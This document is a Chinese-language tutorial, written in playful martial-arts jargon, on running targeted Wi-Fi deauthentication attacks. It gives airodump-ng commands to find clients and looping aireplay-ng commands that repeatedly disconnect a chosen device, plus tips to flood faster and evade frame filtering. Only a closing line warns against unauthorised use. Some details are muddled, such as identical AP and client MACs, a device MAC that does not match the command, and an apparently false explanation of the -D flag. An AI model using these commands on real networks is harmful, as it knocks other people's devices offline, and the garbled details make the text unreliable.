WAPR天阶大法进阶版之wifi爆破(100%暴击攻击)
WAPR天阶大法之wifi爆破(100%暴击攻击)
(1):续监听目标 WiFi并获取客户端MAC
执行以下命令,让 wlan0mon 固定在信道 XXX 并持续监听目标 WiFi
airodump-ng -c 信号道(例如149) --bssid WiFi的MAC (例如AA:BB:CC:DD:EE:FF) wlan0mon
用上述指令捕获到的 客户端 MAC 地址为 AA:BB:CC:DD:EE:FF
(2):天阶大法使用教程
第一步:(新建窗口)
第二步:造天攻击口诀
方法一:
执行定向 DeAuth 攻击
假设从上述命令中捕获到的客户端 MAC 地址为 AA:BB:CC:DD:EE:FF,在之前运行攻击循环命令的终端窗口(若之前的循环命令已停止,重新执行),将命令修改为:
bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c AA:BB:CC:DD:EE:FF -0 5 wlan0mon
sleep 0.03
done
-c AA:BB:CC:DD:EE:FF:指定要攻击的客户端 MAC 地址,实现定向攻击,相比广播攻击,定向攻击对现代设备的效果更好,更易让设备断网。
执行后,观察被攻击设备(对应 AA:BB:CC:DD:EE:FF MAC 地址的设备)的网络连接状态,正常情况下会出现断网、重连的现象。
如果执行后仍未断网,还可以尝试以下操作:
缩短 sleep 时间,如改为 sleep 0.01,增加攻击频率,但要注意不要让网卡过载。
检查目标设备是否支持 5GHz 网络,若目标设备只支持 2.4GHz 网络,而攻击的是 5GHz 信道的网络,设备也无法收到攻击信号导致断网失败。
(列如):
- 选择其中一台设备进行攻击(以F0:20:FF:67:16:8C为例)
在之前运行攻击循环命令的终端窗口,将命令修改为:
bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 5 wlan0mon
sleep 0.03
done
-c A1:B1:C1:D1:E1:F1:指定攻击该 MAC 地址的设备,实现定向攻击。
第三步:观察敌人灵力情况
- 观察设备网络状态
执行命令后,查看对应设备(如手机、电脑等,MAC 为F0:20:FF:67:16:8C的设备)的网络连接情况,正常会出现断网、重连的现象。
3. 若对该设备攻击无效,可换另一台设备(A1:B1:C1:D1:E1:F1)
修改命令为:
第四步:强化造天攻击口诀
bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 5 wlan0mon
sleep 0.03
done
(3)永无葬身乾坤大法
方法二:突击大法
- 更换 DeAuth 帧类型(突破帧验证)
默认发送的是 “代码 7”(code 7)的 DeAuth 帧,部分设备对其过滤严格,可尝试发送 “代码 1”(更接近正常断开场景的帧):
bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 5 -D wlan0mon # -D 表示发送代码1的帧
sleep 0.02
done
- 降低攻击间隔至极限(但需警惕网卡过载)
将间隔缩短至 0.01 秒(每秒 100 帧),用密集流量淹没设备的重连机制:
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 10 wlan0mon # 一次发10帧
sleep 0.01
done
同样观察该设备的网络连接状态
不要攻击未经允许的wifi,违法的!



